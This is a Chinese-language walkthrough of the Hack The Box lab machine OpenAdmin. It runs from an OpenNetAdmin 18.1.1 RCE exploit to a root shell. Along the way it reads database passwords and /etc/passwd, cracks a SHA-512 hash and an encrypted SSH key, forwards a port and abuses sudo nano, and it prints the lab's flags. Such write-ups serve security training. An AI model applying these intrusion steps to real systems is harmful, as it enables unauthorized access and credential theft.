Basic Scan Nmap Scan 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ~/Documents/HTB/OpenAdmin root@kali ❯ cat nmap.txt # Nmap 7.80 scan initiated Sun Jan 26 13:42:29 2020 as: nmap -sV -sC -oN nmap.txt 10.10.10.171 Nmap scan report for 10.10.10.171 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jan 26 13:43:56 2020 -- 1 IP address (1 host up) scanned in 87.35 seconds
Nmap显示开放两个端口,22端口无望,只能从80端口入手。
DirScan 1 2 3 4 5 6 7 ~/Documents/HTB/OpenAdmin root@kali ❯ cat gobuster.txt http://10.10.10.171/music (Status: 301) [Size: 312] http://10.10.10.171/artwork (Status: 301) [Size: 314] http://10.10.10.171/sierra (Status: 301) [Size: 313] http://10.10.10.171/server-status (Status: 403) [Size: 277] http://10.10.10.171/ona (Status: 301) [Size: 310]
显示有许多目录,查看ona后,发现其存在rce。[v18.1.1]
User.txt LowPriv Shell 查找再三,决定使用该PoC[https://github.com/amriunix/ona-rce\]
1 2 3 4 5 6 ~/Documents/HTB/OpenAdmin root@kali 9s ❯ python3 ona-rce.py exploit http://10.10.10.171/ona/ [*] OpenNetAdmin 18.1.1 - Remote Code Execution [+] Connecting ! $ whoami www-data
Migrate to Hight Privilege Step 1. 枚举之后发现数据库密码,以及三个用户,经过测试,该密码同时适用于用户 jimmy
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 www-data@openadmin:/var /www/html/ona/local/config$ cat database_settings.inc.php <?php $ona_contexts =array ( 'DEFAULT' => array ( 'databases' => array ( 0 => array ( 'db_type' => 'mysqli' , 'db_host' => 'localhost' , 'db_login' => 'ona_sys' , 'db_passwd' => 'n1nj4W4rri0R!' , 'db_database' => 'ona_default' , 'db_debug' => false , ), ), 'description' => 'Default data context' , 'context_color' => '#D3DBFF' , ), ); ?>
1 2 3 4 www-data@openadmin:/var/www/html/ona/local/config$ cat /etc/passwd | grep bash root:x:0:0:root:/root:/bin/bash jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
Step 2. 在网页根目录下,发现internal内存在登录该页面密码的密文,目录下main.php内的内容[cat /home/joanna/.ssh/id_rsa]。
1 2 3 4 5 6 7 8 9 10 11 jimmy@openadmin:/var/www/internal$ cat index.php ... <h2>Enter Username and Password</h2> <div class = "container form-signin"> <h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2> <?php $msg = ''; if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) { if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') ...
对该密问进行验证,其密码类型为SHA-512,在线对其破解。得到明文为 Revealed 同时发现internal开放在52846端口,并没有对外网开放。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 jimmy@openadmin:/etc/apache2/sites-available$ cat internal.conf Listen 127.0.0.1:52846 <VirtualHost 127.0.0.1:52846> ServerName internal.openadmin.htb DocumentRoot /var/www/internal <IfModule mpm_itk_module> AssignUserID joanna joanna </IfModule> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost>
使用SSH进行端口转发。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 ~/Documents/HTB/OpenAdmin root@kali ❯ ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171 jimmy@10.10.10.171's password: Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Jan 29 03:29:54 UTC 2020 System load: 0.0 Processes: 128 Usage of /: 49.0% of 7.81GB Users logged in: 1 Memory usage: 19% IP address for ens160: 10.10.10.171 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 41 packages can be updated. 12 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Wed Jan 29 03:11:59 2020 from 10.10.14.13 jimmy@openadmin:~$
访问该页面,得到ssk key
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ~/Documents/HTB/OpenAdmin root@kali ❯ cat id_rsa.hash -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8 ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE 6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI 9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4 piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/ /U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH 40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb 9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80 X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr 1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2 XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79 yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM +4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN -----END RSA PRIVATE KEY-----
使用john进行破解,得到该key的密钥
1 2 3 4 5 6 ~/Documents/HTB/OpenAdmin root@kali ❯ cat cracked.txt Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes bloodninjas (id_rsa.hash)
使用该密钥登录,得到User.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 ~/Documents/HTB/OpenAdmin root@kali ❯ ssh -i id_rsa.hash joanna@10.10.10.171 Enter passphrase for key 'id_rsa.hash': Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Jan 29 03:40:45 UTC 2020 System load: 0.01 Processes: 127 Usage of /: 49.0% of 7.81GB Users logged in: 0 Memory usage: 19% IP address for ens160: 10.10.10.171 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 41 packages can be updated. 12 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3 joanna@openadmin:~$ ls user.txt joanna@openadmin:~$ cat user.txt c9b2cf07d40807e62af62660f0c81b5f joanna@openadmin:~$
Root.txt sudo -l 发现我们可以不输入密码执行nano 对/opt/priv进行编辑,结合GTFO获得root.txt
1 2 3 4 5 6 7 # python3 -c 'import pty;pty.spawn("/bin/bash")' root@openadmin:~# cd /root root@openadmin:/root# ls root.txt root@openadmin:/root# cat root.txt 2f907ed450b361b2c2bf4e8795d5b561 root@openadmin:/root#
